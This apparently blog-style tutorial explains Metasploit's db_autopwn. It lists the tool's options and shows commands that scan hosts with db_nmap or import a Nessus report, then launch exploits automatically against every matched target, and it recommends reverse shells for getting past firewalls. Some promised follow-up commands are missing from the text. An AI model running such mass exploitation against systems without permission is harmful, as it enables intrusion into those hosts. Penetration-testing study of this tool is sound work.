[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds
The ones marked in bold are the ones that we will use in this guide. However option “-r” is also quite useful, as a reverse shell has a higher chance of bypassing a firewall once you have successfully exploited a host. Also you can use “-q” if you don’t want to see all the module executions during autopwn.
First we will look into using db_nmap.
You need to scan the host(s) for open ports so that autopwn knows which ports are open.
db_nmap -sV [IP]
Then you just execute autopwn:
db_autopwn -p -e
Now just watch as the exploits ‘flow’. When they finish you can check if any of the exploits succeeded by doing:
The other method, which I personally find more effective is using Nessus to predetermine the vulnerabilities of the target host. After a successful scan has finished, go to Reports, select the scan you had just done and there is a button called “Download report”. Save it as .nessus somewhere on your HDD.
Then in msfconsole do:
db_autopwn -x -e
Once again you will see the flow of exploits (unless you specified the -q option as well). To check if any of the exploits actually worked, once again do
I will soon post about what can be done once the host has been exploited successfully and a guide on using the meterpreter session.